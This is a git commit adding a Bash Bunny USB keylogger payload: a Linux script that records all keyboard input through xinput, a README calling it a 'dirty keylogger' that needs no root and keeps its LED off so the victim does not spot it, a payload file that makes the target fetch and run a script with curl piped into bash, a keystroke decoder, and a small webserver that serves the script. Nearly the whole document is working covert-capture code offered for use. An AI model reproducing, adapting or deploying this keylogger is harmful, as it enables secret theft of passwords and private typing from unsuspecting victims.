added keylogger
parent
6760498c27
commit
963c000ab9
|
@ -0,0 +1,20 @@
|
|||
#/bin/bash
|
||||
checkonbunny() {
|
||||
mybunny=$(lsblk -p -S -o NAME,SERIAL | grep $BunnyID | awk '{print $1}')
|
||||
mybunny=$(findmnt $mybunny | grep $mybunny | awk '{print $1}')
|
||||
if [ -d $mybunny ]; then
|
||||
bashbunnyloot=$mybunny"/loot"
|
||||
mapfile=$bashbunnyloot"/maps"
|
||||
keyfile=$bashbunnyloot"/keys"
|
||||
startwork
|
||||
fi
|
||||
}
|
||||
startwork(){
|
||||
getdevicetouse=${getdevicetouse#"id="}
|
||||
xinput --test $getdevicetouse > $keyfile &
|
||||
xmodmap -pke > $mapfile
|
||||
}
|
||||
BunnyID="ch000001"
|
||||
bashbunnyloot=''
|
||||
getdevicetouse=$(xinput |grep keyboard | sed 's/slave keyboard//g' | while IFS= read -r line ;do [[ $line != *"Virtual"* ]] && [[ $line == *"keyboard"* ]] && echo $line | awk '{ for (i=1; i<=NF; ++i) { if ($i ~ "id=") print $i} }'; done)
|
||||
[[ -z $getdevicetouse ]] || checkonbunny
|
|
@ -0,0 +1,28 @@
|
|||
# Keylogger For Bash Bunny
|
||||
|
||||
Author: TheDragonkeeper
|
||||
|
||||
Version: Version 1
|
||||
|
||||
## Description
|
||||
|
||||
Dirty keylogger. Runs a webserver to pull code from for multiOS targeting
|
||||
|
||||
Captures all keyboard input without the need for root access
|
||||
Uses the user keyboard map file for decoding the captured data
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ---------------- | ----------------------------------------------------------------------------- |
|
||||
| Blue flash | Booting |
|
||||
| Red slow | Waiting on webserver |
|
||||
| Blue Fast | Identifying Target and deploying accordingly |
|
||||
| LED OFF | Capturing data, no led for victim to spot, waiting for switch position change |
|
||||
| LED Red Fast | Decoding keys, Then doing any cleanup required |
|
||||
| Green flashing | Task complete, ready to unplug |
|
||||
|
||||
Still WIP, Currently supports linux (tested on ubuntu)
|
||||
If you want to add payloads for OSX or Windows place them into the switch folder then,
|
||||
Change TARGET_OS= to 'auto' and add the payloads to lines 15,16 as well as the clean up to lines 40,41 in payload.txt
|
||||
|
|
@ -0,0 +1,43 @@
|
|||
TARGET_OS='LINUX'
|
||||
|
||||
LED B 100
|
||||
ATTACKMODE HID STORAGE ECM_ETHERNET
|
||||
sleep 3
|
||||
LED R SLOW
|
||||
GET HOST_IP
|
||||
GET SWITCH_POSITION
|
||||
udisk mount
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||
python webserver.py &
|
||||
while true; do [[ $(curl $HOST_IP:8080/index.html) ]] && break ; done
|
||||
LED B FAST
|
||||
[[ $TARGET_OS == 'auto' ]] && GET TARGET_OS
|
||||
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
|
||||
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
|
||||
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX bash \-c \'bash \<\(curl http\:\/\/$HOST_IP\:8080\/Linux\.sh\)\' \&
|
||||
LED
|
||||
WAIT
|
||||
LED R 0
|
||||
cd /root/udisk/loot
|
||||
keystate=''
|
||||
_ctrl='0'
|
||||
_alt='0'
|
||||
_shift='0'
|
||||
for line in $(cat 'keys')
|
||||
do
|
||||
if [ $line != 'key' ]; then
|
||||
if [ $line == 'press' ] || [ $line == 'release' ]; then
|
||||
keystate=$line
|
||||
else
|
||||
_spaces=$(printf '%*s' $((4-${#line})) | tr ' ' ' ')
|
||||
searchparams='keycode'"$_spaces"$line
|
||||
key=$(cat 'maps' | grep "$searchparams" | awk '{print $4}')
|
||||
echo "Ctrl="$_ctrl" Alt="$_alt" Shift="$_shift" "$keystate" "$key >> 'decoded'
|
||||
|
||||
fi
|
||||
fi
|
||||
done
|
||||
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
|
||||
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
|
||||
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX killall xinput
|
||||
LED G 0
|
|
@ -0,0 +1,28 @@
|
|||
#!/usr/bin/python
|
||||
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
|
||||
from os import curdir, sep
|
||||
PORT_NUMBER = 8080
|
||||
class myHandler(BaseHTTPRequestHandler):
|
||||
def do_GET(self):
|
||||
if self.path=="/":
|
||||
self.path="/"
|
||||
try:
|
||||
sendReply = False
|
||||
if self.path.endswith(".sh"):
|
||||
mimetype='text/plain'
|
||||
sendReply = True
|
||||
if sendReply == True:
|
||||
f = open(curdir + sep + self.path)
|
||||
self.send_response(200)
|
||||
self.send_header('Content-type',mimetype)
|
||||
self.end_headers()
|
||||
self.wfile.write(f.read())
|
||||
f.close()
|
||||
return
|
||||
except IOError:
|
||||
self.send_error(404,'File Not Found: %s' % self.path)
|
||||
try:
|
||||
server = HTTPServer(('0.0.0.0', PORT_NUMBER), myHandler)
|
||||
server.serve_forever()
|
||||
except KeyboardInterrupt:
|
||||
server.socket.close()
|
Loading…
Reference in New Issue